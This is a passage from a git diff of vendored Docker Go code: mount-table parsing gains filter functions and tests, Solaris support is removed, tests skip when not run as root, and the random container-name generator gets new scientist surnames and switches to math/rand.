+187 35 253:20 / /var/lib/docker/devicemapper/mnt/8d9df91c4cca5aef49eeb2725292aab324646f723a7feab56be34c2ad08268e1 rw,relatime shared:169 - ext4 /dev/mapper/docker-253:2-425882-8d9df91c4cca5aef49eeb2725292aab324646f723a7feab56be34c2ad08268e1 rw,seclabel,discard,stripe=16,data=ordered
+191 35 253:21 / /var/lib/docker/devicemapper/mnt/c8240b768603d32e920d365dc9d1dc2a6af46cd23e7ae819947f969e1b4ec661 rw,relatime shared:173 - ext4 /dev/mapper/docker-253:2-425882-c8240b768603d32e920d365dc9d1dc2a6af46cd23e7ae819947f969e1b4ec661 rw,seclabel,discard,stripe=16,data=ordered
+195 35 253:22 / /var/lib/docker/devicemapper/mnt/2eb3a01278380bbf3ed12d86ac629eaa70a4351301ee307a5cabe7b5f3b1615f rw,relatime shared:177 - ext4 /dev/mapper/docker-253:2-425882-2eb3a01278380bbf3ed12d86ac629eaa70a4351301ee307a5cabe7b5f3b1615f rw,seclabel,discard,stripe=16,data=ordered
+199 35 253:23 / /var/lib/docker/devicemapper/mnt/37a17fb7c9d9b80821235d5f2662879bd3483915f245f9b49cdaa0e38779b70b rw,relatime shared:181 - ext4 /dev/mapper/docker-253:2-425882-37a17fb7c9d9b80821235d5f2662879bd3483915f245f9b49cdaa0e38779b70b rw,seclabel,discard,stripe=16,data=ordered
+203 35 253:24 / /var/lib/docker/devicemapper/mnt/aea459ae930bf1de913e2f29428fd80ee678a1e962d4080019d9f9774331ee2b rw,relatime shared:185 - ext4 /dev/mapper/docker-253:2-425882-aea459ae930bf1de913e2f29428fd80ee678a1e962d4080019d9f9774331ee2b rw,seclabel,discard,stripe=16,data=ordered
+207 35 253:25 / /var/lib/docker/devicemapper/mnt/928ead0bc06c454bd9f269e8585aeae0a6bd697f46dc8754c2a91309bc810882 rw,relatime shared:189 - ext4 /dev/mapper/docker-253:2-425882-928ead0bc06c454bd9f269e8585aeae0a6bd697f46dc8754c2a91309bc810882 rw,seclabel,discard,stripe=16,data=ordered
+211 35 253:26 / /var/lib/docker/devicemapper/mnt/0f284d18481d671644706e7a7244cbcf63d590d634cc882cb8721821929d0420 rw,relatime shared:193 - ext4 /dev/mapper/docker-253:2-425882-0f284d18481d671644706e7a7244cbcf63d590d634cc882cb8721821929d0420 rw,seclabel,discard,stripe=16,data=ordered
+215 35 253:27 / /var/lib/docker/devicemapper/mnt/d9dd16722ab34c38db2733e23f69e8f4803ce59658250dd63e98adff95d04919 rw,relatime shared:197 - ext4 /dev/mapper/docker-253:2-425882-d9dd16722ab34c38db2733e23f69e8f4803ce59658250dd63e98adff95d04919 rw,seclabel,discard,stripe=16,data=ordered
+219 35 253:28 / /var/lib/docker/devicemapper/mnt/bc4500479f18c2c08c21ad5282e5f826a016a386177d9874c2764751c031d634 rw,relatime shared:201 - ext4 /dev/mapper/docker-253:2-425882-bc4500479f18c2c08c21ad5282e5f826a016a386177d9874c2764751c031d634 rw,seclabel,discard,stripe=16,data=ordered
+223 35 253:29 / /var/lib/docker/devicemapper/mnt/7770c8b24eb3d5cc159a065910076938910d307ab2f5d94e1dc3b24c06ee2c8a rw,relatime shared:205 - ext4 /dev/mapper/docker-253:2-425882-7770c8b24eb3d5cc159a065910076938910d307ab2f5d94e1dc3b24c06ee2c8a rw,seclabel,discard,stripe=16,data=ordered
+227 35 253:30 / /var/lib/docker/devicemapper/mnt/c280cd3d0bf0aa36b478b292279671624cceafc1a67eaa920fa1082601297adf rw,relatime shared:209 - ext4 /dev/mapper/docker-253:2-425882-c280cd3d0bf0aa36b478b292279671624cceafc1a67eaa920fa1082601297adf rw,seclabel,discard,stripe=16,data=ordered
+231 35 253:31 / /var/lib/docker/devicemapper/mnt/8b59a7d9340279f09fea67fd6ad89ddef711e9e7050eb647984f8b5ef006335f rw,relatime shared:213 - ext4 /dev/mapper/docker-253:2-425882-8b59a7d9340279f09fea67fd6ad89ddef711e9e7050eb647984f8b5ef006335f rw,seclabel,discard,stripe=16,data=ordered
+235 35 253:32 / /var/lib/docker/devicemapper/mnt/1a28059f29eda821578b1bb27a60cc71f76f846a551abefabce6efd0146dce9f rw,relatime shared:217 - ext4 /dev/mapper/docker-253:2-425882-1a28059f29eda821578b1bb27a60cc71f76f846a551abefabce6efd0146dce9f rw,seclabel,discard,stripe=16,data=ordered
+239 35 253:33 / /var/lib/docker/devicemapper/mnt/e9aa60c60128cad1 rw,relatime shared:221 - ext4 /dev/mapper/docker-253:2-425882-e9aa60c60128cad1 rw,seclabel,discard,stripe=16,data=ordered
+243 35 253:34 / /var/lib/docker/devicemapper/mnt/5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d-init rw,relatime shared:225 - ext4 /dev/mapper/docker-253:2-425882-5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d-init rw,seclabel,discard,stripe=16,data=ordered
+247 35 253:35 / /var/lib/docker/devicemapper/mnt/5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d rw,relatime shared:229 - ext4 /dev/mapper/docker-253:2-425882-5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d rw,seclabel,discard,stripe=16,data=ordered
+31 21 0:23 / /DATA/foo_bla_bla rw,relatime - cifs //foo/BLA\040BLA\040BLA/ rw,sec=ntlm,cache=loose,unc=\\foo\BLA BLA BLA,username=my_login,domain=mydomain.com,uid=12345678,forceuid,gid=12345678,forcegid,addr=10.1.30.10,file_mode=0755,dir_mode=0755,nounix,rsize=61440,wsize=65536,actimeo=1`
 
 	ubuntuMountInfo = `15 20 0:14 / /sys rw,nosuid,nodev,noexec,relatime - sysfs sysfs rw
 16 20 0:3 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
@@ -424,7 +426,7 @@ const (
 
 func TestParseFedoraMountinfo(t *testing.T) {
 	r := bytes.NewBuffer([]byte(fedoraMountinfo))
-	_, err := parseInfoFile(r)
+	_, err := parseInfoFile(r, nil)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -432,7 +434,7 @@ func TestParseFedoraMountinfo(t *testing.T) {
 
 func TestParseUbuntuMountinfo(t *testing.T) {
 	r := bytes.NewBuffer([]byte(ubuntuMountInfo))
-	_, err := parseInfoFile(r)
+	_, err := parseInfoFile(r, nil)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -440,7 +442,7 @@ func TestParseUbuntuMountinfo(t *testing.T) {
 
 func TestParseGentooMountinfo(t *testing.T) {
 	r := bytes.NewBuffer([]byte(gentooMountinfo))
-	_, err := parseInfoFile(r)
+	_, err := parseInfoFile(r, nil)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -448,7 +450,7 @@ func TestParseGentooMountinfo(t *testing.T) {
 
 func TestParseFedoraMountinfoFields(t *testing.T) {
 	r := bytes.NewBuffer([]byte(fedoraMountinfo))
-	infos, err := parseInfoFile(r)
+	infos, err := parseInfoFile(r, nil)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -474,3 +476,33 @@ func TestParseFedoraMountinfoFields(t *testing.T) {
 		t.Fatalf("expected %#v, got %#v", mi, infos[0])
 	}
 }
+
+func TestParseMountinfoFilters(t *testing.T) {
+	r := bytes.NewReader([]byte(fedoraMountinfo))
+
+	infos, err := parseInfoFile(r, SingleEntryFilter("/sys/fs/cgroup"))
+	assert.NilError(t, err)
+	assert.Equal(t, 1, len(infos))
+
+	r.Reset([]byte(fedoraMountinfo))
+	infos, err = parseInfoFile(r, SingleEntryFilter("nonexistent"))
+	assert.NilError(t, err)
+	assert.Equal(t, 0, len(infos))
+
+	r.Reset([]byte(fedoraMountinfo))
+	infos, err = parseInfoFile(r, PrefixFilter("/sys"))
+	assert.NilError(t, err)
+	// there are 18 entries starting with /sys in fedoraMountinfo
+	assert.Equal(t, 18, len(infos))
+
+	r.Reset([]byte(fedoraMountinfo))
+	infos, err = parseInfoFile(r, PrefixFilter("nonexistent"))
+	assert.NilError(t, err)
+	assert.Equal(t, 0, len(infos))
+
+	r.Reset([]byte(fedoraMountinfo))
+	infos, err = parseInfoFile(r, ParentsFilter("/sys/fs/cgroup/cpu,cpuacct"))
+	assert.NilError(t, err)
+	// there should be 4 results returned: /sys/fs/cgroup/cpu,cpuacct /sys/fs/cgroup /sys /
+	assert.Equal(t, 4, len(infos))
+}
diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go
deleted file mode 100644
index ad9ab57f8b..0000000000
--- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go
+++ /dev/null
@@ -1,37 +0,0 @@
-// +build solaris,cgo
-
-package mount
-
-/*
-#include <stdio.h>
-#include <sys/mnttab.h>
-*/
-import "C"
-
-import (
-	"fmt"
-)
-
-func parseMountTable() ([]*Info, error) {
-	mnttab := C.fopen(C.CString(C.MNTTAB), C.CString("r"))
-	if mnttab == nil {
-		return nil, fmt.Errorf("Failed to open %s", C.MNTTAB)
-	}
-
-	var out []*Info
-	var mp C.struct_mnttab
-
-	ret := C.getmntent(mnttab, &mp)
-	for ret == 0 {
-		var mountinfo Info
-		mountinfo.Mountpoint = C.GoString(mp.mnt_mountp)
-		mountinfo.Source = C.GoString(mp.mnt_special)
-		mountinfo.Fstype = C.GoString(mp.mnt_fstype)
-		mountinfo.Opts = C.GoString(mp.mnt_mntopts)
-		out = append(out, &mountinfo)
-		ret = C.getmntent(mnttab, &mp)
-	}
-
-	C.fclose(mnttab)
-	return out, nil
-}
diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go
index 7fbcf19214..fd16d3ed69 100644
--- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go
+++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go
@@ -1,12 +1,12 @@
-// +build !windows,!linux,!freebsd,!solaris freebsd,!cgo solaris,!cgo
+// +build !windows,!linux,!freebsd freebsd,!cgo
 
-package mount
+package mount // import "github.com/docker/docker/pkg/mount"
 
 import (
 	"fmt"
 	"runtime"
 )
 
-func parseMountTable() ([]*Info, error) {
+func parseMountTable(f FilterFunc) ([]*Info, error) {
 	return nil, fmt.Errorf("mount.parseMountTable is not implemented on %s/%s", runtime.GOOS, runtime.GOARCH)
 }
diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go
index dab8a37ed0..27e0f6976e 100644
--- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go
+++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go
@@ -1,6 +1,6 @@
-package mount
+package mount // import "github.com/docker/docker/pkg/mount"
 
-func parseMountTable() ([]*Info, error) {
+func parseMountTable(f FilterFunc) ([]*Info, error) {
 	// Do NOT return an error!
 	return nil, nil
 }
diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go
index 8ceec84bc6..538f6637a0 100644
--- a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go
+++ b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go
@@ -1,6 +1,4 @@
-// +build linux
-
-package mount
+package mount // import "github.com/docker/docker/pkg/mount"
 
 // MakeShared ensures a mounted filesystem has the SHARED mount option enabled.
 // See the supported options in flags.go for further reference.
diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go
index c1837942e3..019514491f 100644
--- a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go
+++ b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go
@@ -1,16 +1,21 @@
 // +build linux
 
-package mount
+package mount // import "github.com/docker/docker/pkg/mount"
 
 import (
 	"os"
 	"path"
-	"syscall"
 	"testing"
+
+	"golang.org/x/sys/unix"
 )
 
 // nothing is propagated in or out
 func TestSubtreePrivate(t *testing.T) {
+	if os.Getuid() != 0 {
+		t.Skip("root required")
+	}
+
 	tmp := path.Join(os.TempDir(), "mount-tests")
 	if err := os.MkdirAll(tmp, 0777); err != nil {
 		t.Fatal(err)
@@ -109,6 +114,10 @@ func TestSubtreePrivate(t *testing.T) {
 // Testing that when a target is a shared mount,
 // then child mounts propagate to the source
 func TestSubtreeShared(t *testing.T) {
+	if os.Getuid() != 0 {
+		t.Skip("root required")
+	}
+
 	tmp := path.Join(os.TempDir(), "mount-tests")
 	if err := os.MkdirAll(tmp, 0777); err != nil {
 		t.Fatal(err)
@@ -177,6 +186,10 @@ func TestSubtreeShared(t *testing.T) {
 // testing that mounts to a shared source show up in the slave target,
 // and that mounts into a slave target do _not_ show up in the shared source
 func TestSubtreeSharedSlave(t *testing.T) {
+	if os.Getuid() != 0 {
+		t.Skip("root required")
+	}
+
 	tmp := path.Join(os.TempDir(), "mount-tests")
 	if err := os.MkdirAll(tmp, 0777); err != nil {
 		t.Fatal(err)
@@ -281,6 +294,10 @@ func TestSubtreeSharedSlave(t *testing.T) {
 }
 
 func TestSubtreeUnbindable(t *testing.T) {
+	if os.Getuid() != 0 {
+		t.Skip("root required")
+	}
+
 	tmp := path.Join(os.TempDir(), "mount-tests")
 	if err := os.MkdirAll(tmp, 0777); err != nil {
 		t.Fatal(err)
@@ -309,7 +326,7 @@ func TestSubtreeUnbindable(t *testing.T) {
 	}()
 
 	// then attempt to mount it to target. It should fail
-	if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil && err != syscall.EINVAL {
+	if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil && err != unix.EINVAL {
 		t.Fatal(err)
 	} else if err == nil {
 		t.Fatalf("%q should not have been bindable", sourceDir)
diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go
deleted file mode 100644
index 09f6b03cbc..0000000000
--- a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go
+++ /dev/null
@@ -1,58 +0,0 @@
-// +build solaris
-
-package mount
-
-// MakeShared ensures a mounted filesystem has the SHARED mount option enabled.
-// See the supported options in flags.go for further reference.
-func MakeShared(mountPoint string) error {
-	return ensureMountedAs(mountPoint, "shared")
-}
-
-// MakeRShared ensures a mounted filesystem has the RSHARED mount option enabled.
-// See the supported options in flags.go for further reference.
-func MakeRShared(mountPoint string) error {
-	return ensureMountedAs(mountPoint, "rshared")
-}
-
-// MakePrivate ensures a mounted filesystem has the PRIVATE mount option enabled.
-// See the supported options in flags.go for further reference.
-func MakePrivate(mountPoint string) error {
-	return ensureMountedAs(mountPoint, "private")
-}
-
-// MakeRPrivate ensures a mounted filesystem has the RPRIVATE mount option
-// enabled. See the supported options in flags.go for further reference.
-func MakeRPrivate(mountPoint string) error {
-	return ensureMountedAs(mountPoint, "rprivate")
-}
-
-// MakeSlave ensures a mounted filesystem has the SLAVE mount option enabled.
-// See the supported options in flags.go for further reference.
-func MakeSlave(mountPoint string) error {
-	return ensureMountedAs(mountPoint, "slave")
-}
-
-// MakeRSlave ensures a mounted filesystem has the RSLAVE mount option enabled.
-// See the supported options in flags.go for further reference.
-func MakeRSlave(mountPoint string) error {
-	return ensureMountedAs(mountPoint, "rslave")
-}
-
-// MakeUnbindable ensures a mounted filesystem has the UNBINDABLE mount option
-// enabled. See the supported options in flags.go for further reference.
-func MakeUnbindable(mountPoint string) error {
-	return ensureMountedAs(mountPoint, "unbindable")
-}
-
-// MakeRUnbindable ensures a mounted filesystem has the RUNBINDABLE mount
-// option enabled. See the supported options in flags.go for further reference.
-func MakeRUnbindable(mountPoint string) error {
-	return ensureMountedAs(mountPoint, "runbindable")
-}
-
-func ensureMountedAs(mountPoint, options string) error {
-	// TODO: Solaris does not support bind mounts.
-	// Evaluate lofs and also look at the relevant
-	// mount flags to be supported.
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go b/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go
index 18a939b70b..7fd5955beb 100644
--- a/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go
+++ b/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go
@@ -2,10 +2,13 @@ package main
 
 import (
 	"fmt"
+	"math/rand"
+	"time"
 
 	"github.com/docker/docker/pkg/namesgenerator"
 )
 
 func main() {
+	rand.Seed(time.Now().UnixNano())
 	fmt.Println(namesgenerator.GetRandomName(0))
 }
diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go
index cfb8157d69..5c3395aaaa 100644
--- a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go
+++ b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go
@@ -1,9 +1,8 @@
-package namesgenerator
+package namesgenerator // import "github.com/docker/docker/pkg/namesgenerator"
 
 import (
 	"fmt"
-
-	"github.com/docker/docker/pkg/random"
+	"math/rand"
 )
 
 var (
@@ -56,7 +55,6 @@ var (
 		"jolly",
 		"jovial",
 		"keen",
-		"kickass",
 		"kind",
 		"laughing",
 		"loving",
@@ -95,6 +93,7 @@ var (
 		"upbeat",
 		"vibrant",
 		"vigilant",
+		"vigorous",
 		"wizardly",
 		"wonderful",
 		"xenodochial",
@@ -151,6 +150,9 @@ var (
 		// Alexander Graham Bell - an eminent Scottish-born scientist, inventor, engineer and innovator who is credited with inventing the first practical telephone - https://en.wikipedia.org/wiki/Alexander_Graham_Bell
 		"bell",
 
+		// Karl Friedrich Benz - a German automobile engineer. Inventor of the first practical motorcar. https://en.wikipedia.org/wiki/Karl_Benz
+		"benz",
+
 		// Homi J Bhabha - was an Indian nuclear physicist, founding director, and professor of physics at the Tata Institute of Fundamental Research. Colloquially known as "father of Indian nuclear programme"- https://en.wikipedia.org/wiki/Homi_J._Bhabha
 		"bhabha",
 
@@ -190,6 +192,15 @@ var (
 		// Subrahmanyan Chandrasekhar - Astrophysicist known for his mathematical theory on different stages and evolution in structures of the stars. He has won nobel prize for physics - https://en.wikipedia.org/wiki/Subrahmanyan_Chandrasekhar
 		"chandrasekhar",
 
+		//Sergey Alexeyevich Chaplygin (Russian: Серге́й Алексе́евич Чаплы́гин; April 5, 1869 – October 8, 1942) was a Russian and Soviet physicist, mathematician, and mechanical engineer. He is known for mathematical formulas such as Chaplygin's equation and for a hypothetical substance in cosmology called Chaplygin gas, named after him. https://en.wikipedia.org/wiki/Sergey_Chaplygin
+		"chaplygin",
+
+		// Asima Chatterjee was an indian organic chemist noted for her research on vinca alkaloids, development of drugs for treatment of epilepsy and malaria - https://en.wikipedia.org/wiki/Asima_Chatterjee
+		"chatterjee",
+
+		// Pafnuty Chebyshev - Russian mathematician. He is known fo his works on probability, statistics, mechanics, analytical geometry and number theory https://en.wikipedia.org/wiki/Pafnuty_Chebyshev
+		"chebyshev",
+
 		//Claude Shannon - The father of information theory and founder of digital circuit design theory. (https://en.wikipedia.org/wiki/Claude_Shannon)
 		"shannon",
 
@@ -237,6 +248,9 @@ var (
 		// Gertrude Elion - American biochemist, pharmacologist and the 1988 recipient of the Nobel Prize in Medicine - https://en.wikipedia.org/wiki/Gertrude_Elion
 		"elion",
 
+		// Alexandra Asanovna Elbakyan (Russian: Алекса́ндра Аса́новна Элбакя́н) is a Kazakhstani graduate student, computer programmer, internet pirate in hiding, and the creator of the site Sci-Hub. Nature has listed her in 2016 in the top ten people that mattered in science, and Ars Technica has compared her to Aaron Swartz. - https://en.wikipedia.org/wiki/Alexandra_Elbakyan
+		"elbakyan",
+
 		// Douglas Engelbart gave the mother of all demos: https://en.wikipedia.org/wiki/Douglas_Engelbart
 		"engelbart",
 
@@ -291,6 +305,9 @@ var (
 		// Werner Heisenberg was a founding father of quantum mechanics. https://en.wikipedia.org/wiki/Werner_Heisenberg
 		"heisenberg",
 
+		// Grete Hermann was a German philosopher noted for her philosophical work on the foundations of quantum mechanics. https://en.wikipedia.org/wiki/Grete_Hermann
+		"hermann",
+
 		// Jaroslav Heyrovský was the inventor of the polarographic method, father of the electroanalytical method, and recipient of the Nobel Prize in 1959. His main field of work was polarography. https://en.wikipedia.org/wiki/Jaroslav_Heyrovsk%C3%BD
 		"heyrovsky",
 
@@ -309,6 +326,9 @@ var (
 		// Hypatia - Greek Alexandrine Neoplatonist philosopher in Egypt who was one of the earliest mothers of mathematics - https://en.wikipedia.org/wiki/Hypatia
 		"hypatia",
 
+		// Mary Jackson, American mathematician and aerospace engineer who earned the highest title within NASA's engineering department - https://en.wikipedia.org/wiki/Mary_Jackson_(engineer)
+		"jackson",
+
 		// Yeong-Sil Jang was a Korean scientist and astronomer during the Joseon Dynasty; he invented the first metal printing press and water gauge. https://en.wikipedia.org/wiki/Jang_Yeong-sil
 		"jang",
 
@@ -318,6 +338,9 @@ var (
 		// Mary Lou Jepsen, was the founder and chief technology officer of One Laptop Per Child (OLPC), and the founder of Pixel Qi. https://en.wikipedia.org/wiki/Mary_Lou_Jepsen
 		"jepsen",
 
+		// Katherine Coleman Goble Johnson - American physicist and mathematician contributed to the NASA. https://en.wikipedia.org/wiki/Katherine_Johnson
+		"johnson",
+
 		// Irène Joliot-Curie - French scientist who was awarded the Nobel Prize for Chemistry in 1935. Daughter of Marie and Pierre Curie. https://en.wikipedia.org/wiki/Ir%C3%A8ne_Joliot-Curie
 		"joliot",
 
@@ -327,12 +350,21 @@ var (
 		// A. P. J. Abdul Kalam - is an Indian scientist aka Missile Man of India for his work on the development of ballistic missile and launch vehicle technology - https://en.wikipedia.org/wiki/A._P._J._Abdul_Kalam
 		"kalam",
 
+		// Sergey Petrovich Kapitsa (Russian: Серге́й Петро́вич Капи́ца; 14 February 1928 – 14 August 2012) was a Russian physicist and demographer. He was best known as host of the popular and long-running Russian scientific TV show, Evident, but Incredible. His father was the Nobel laureate Soviet-era physicist Pyotr Kapitsa, and his brother was the geographer and Antarctic explorer Andrey Kapitsa. - https://en.wikipedia.org/wiki/Sergey_Kapitsa
+		"kapitsa",
+
 		// Susan Kare, created the icons and many of the interface elements for the original Apple Macintosh in the 1980s, and was an original employee of NeXT, working as the Creative Director. https://en.wikipedia.org/wiki/Susan_Kare
 		"kare",
 
+		// Mstislav Keldysh - a Soviet scientist in the field of mathematics and mechanics, academician of the USSR Academy of Sciences (1946), President of the USSR Academy of Sciences (1961–1975), three times Hero of Socialist Labor (1956, 1961, 1971), fellow of the Royal Society of Edinburgh (1968). https://en.wikipedia.org/wiki/Mstislav_Keldysh
+		"keldysh",
+
 		// Mary Kenneth Keller, Sister Mary Kenneth Keller became the first American woman to earn a PhD in Computer Science in 1965. https://en.wikipedia.org/wiki/Mary_Kenneth_Keller
 		"keller",
 
+		// Johannes Kepler, German astronomer known for his three laws of planetary motion - https://en.wikipedia.org/wiki/Johannes_Kepler
+		"kepler",
+
 		// Har Gobind Khorana - Indian-American biochemist who shared the 1968 Nobel Prize for Physiology - https://en.wikipedia.org/wiki/Har_Gobind_Khorana
 		"khorana",
 
@@ -396,6 +428,9 @@ var (
 		// Kay McNulty - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Kathleen_Antonelli
 		"mcnulty",
 
+		// Dmitri Mendeleev - a chemist and inventor. He formulated the Periodic Law, created a farsighted version of the periodic table of elements, and used it to correct the properties of some already discovered elements and also to predict the properties of eight elements yet to be discovered. https://en.wikipedia.org/wiki/Dmitri_Mendeleev
+		"mendeleev",
+
 		// Lise Meitner - Austrian/Swedish physicist who was involved in the discovery of nuclear fission. The element meitnerium is named after her - https://en.wikipedia.org/wiki/Lise_Meitner
 		"meitner",
 
@@ -417,6 +452,9 @@ var (
 		// Ian Murdock - founder of the Debian project - https://en.wikipedia.org/wiki/Ian_Murdock
 		"murdock",
 
+		// John von Neumann - todays computer architectures are based on the von Neumann architecture. https://en.wikipedia.org/wiki/Von_Neumann_architecture
+		"neumann",
+
 		// Isaac Newton invented classic mechanics and modern optics. https://en.wikipedia.org/wiki/Isaac_Newton
 		"newton",
 
@@ -459,6 +497,9 @@ var (
 		// Laura Poitras is a director and producer whose work, made possible by open source crypto tools, advances the causes of truth and freedom of information by reporting disclosures by whistleblowers such as Edward Snowden. https://en.wikipedia.org/wiki/Laura_Poitras
 		"poitras",
 
+		// Tat’yana Avenirovna Proskuriakova (Russian: Татья́на Авени́ровна Проскуряко́ва) (January 23 [O.S. January 10] 1909 – August 30, 1985) was a Russian-American Mayanist scholar and archaeologist who contributed significantly to the deciphering of Maya hieroglyphs, the writing system of the pre-Columbian Maya civilization of Mesoamerica. https://en.wikipedia.org/wiki/Tatiana_Proskouriakoff
+		"proskuriakova",
+
 		// Claudius Ptolemy - a Greco-Egyptian writer of Alexandria, known as a mathematician, astronomer, geographer, astrologer, and poet of a single epigram in the Greek Anthology - https://en.wikipedia.org/wiki/Ptolemy
 		"ptolemy",
 
@@ -510,6 +551,9 @@ var (
 		// Richard Matthew Stallman - the founder of the Free Software movement, the GNU project, the Free Software Foundation, and the League for Programming Freedom. He also invented the concept of copyleft to protect the ideals of this movement, and enshrined this concept in the widely-used GPL (General Public License) for software. https://en.wikiquote.org/wiki/Richard_Stallman
 		"stallman",
 
+		// Lina Solomonovna Stern (or Shtern; Russian: Лина Соломоновна Штерн; 26 August 1878 – 7 March 1968) was a Soviet biochemist, physiologist and humanist whose medical discoveries saved thousands of lives at the fronts of World War II. She is best known for her pioneering work on blood–brain barrier, which she described as hemato-encephalic barrier in 1921. https://en.wikipedia.org/wiki/Lina_Stern
+		"shtern",
+
 		// Michael Stonebraker is a database research pioneer and architect of Ingres, Postgres, VoltDB and SciDB. Winner of 2014 ACM Turing Award. https://en.wikipedia.org/wiki/Michael_Stonebraker
 		"stonebraker",
 
@@ -522,6 +566,9 @@ var (
 		// Bertha Swirles was a theoretical physicist who made a number of contributions to early quantum theory. https://en.wikipedia.org/wiki/Bertha_Swirles
 		"swirles",
 
+		// Valentina Tereshkova is a russian engineer, cosmonaut and politician. She was the first woman flying to space in 1963. In 2013, at the age of 76, she offered to go on a one-way mission to mars. https://en.wikipedia.org/wiki/Valentina_Tereshkova
+		"tereshkova",
+
 		// Nikola Tesla invented the AC electric system and every gadget ever used by a James Bond villain. https://en.wikipedia.org/wiki/Nikola_Tesla
 		"tesla",
 
@@ -537,12 +584,18 @@ var (
 		// Varahamihira - Ancient Indian mathematician who discovered trigonometric formulae during 505-587 CE - https://en.wikipedia.org/wiki/Var%C4%81hamihira#Contributions
 		"varahamihira",
 
+		// Dorothy Vaughan was a NASA mathematician and computer programmer on the SCOUT launch vehicle program that put America's first satellites into space - https://en.wikipedia.org/wiki/Dorothy_Vaughan
+		"vaughan",
+
 		// Sir Mokshagundam Visvesvaraya - is a notable Indian engineer.  He is a recipient of the Indian Republic's highest honour, the Bharat Ratna, in 1955. On his birthday, 15 September is celebrated as Engineer's Day in India in his memory - https://en.wikipedia.org/wiki/Visvesvaraya
 		"visvesvaraya",
 
 		// Christiane Nüsslein-Volhard - German biologist, won Nobel Prize in Physiology or Medicine in 1995 for research on the genetic control of embryonic development. https://en.wikipedia.org/wiki/Christiane_N%C3%BCsslein-Volhard
 		"volhard",
 
+		// Cédric Villani - French mathematician, won Fields Medal, Fermat Prize and Poincaré Price for his work in differential geometry and statistical mechanics. https://en.wikipedia.org/wiki/C%C3%A9dric_Villani
+		"villani",
+
 		// Marlyn Wescoff - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Marlyn_Meltzer
 		"wescoff",
 
@@ -569,6 +622,9 @@ var (
 
 		// Ada Yonath - an Israeli crystallographer, the first woman from the Middle East to win a Nobel prize in the sciences. https://en.wikipedia.org/wiki/Ada_Yonath
 		"yonath",
+
+		// Nikolay Yegorovich Zhukovsky (Russian: Никола́й Его́рович Жуко́вский, January 17 1847 – March 17, 1921) was a Russian scientist, mathematician and engineer, and a founding father of modern aero- and hydrodynamics. Whereas contemporary scientists scoffed at the idea of human flight, Zhukovsky was the first to undertake the study of airflow. He is often called the Father of Russian Aviation. https://en.wikipedia.org/wiki/Nikolay_Yegorovich_Zhukovsky
+		"zhukovsky",
 	}
 )
 
@@ -576,15 +632,14 @@ var (
 // formatted as "adjective_surname". For example 'focused_turing'. If retry is non-zero, a random
 // integer between 0 and 10 will be added to the end of the name, e.g `focused_turing3`
 func GetRandomName(retry int) string {
-	rnd := random.Rand
 begin:
-	name := fmt.Sprintf("%s_%s", left[rnd.Intn(len(left))], right[rnd.Intn(len(right))])
+	name := fmt.Sprintf("%s_%s", left[rand.Intn(len(left))], right[rand.Intn(len(right))])
 	if name == "boring_wozniak" /* Steve Wozniak is not boring */ {
 		goto begin
 	}
 
 	if retry > 0 {
-		name = fmt.Sprintf("%s%d", name, rnd.Intn(10))
+		name = fmt.Sprintf("%s%d", name, rand.Intn(10))
 	}
 	return name
 }
diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go
index d1a94977d7..6ee31e9c33 100644
--- a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go
+++ b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go
@@ -1,4 +1,4 @@
-package namesgenerator
+package namesgenerator // import "github.com/docker/docker/pkg/namesgenerator"
 
 import (
 	"strings"
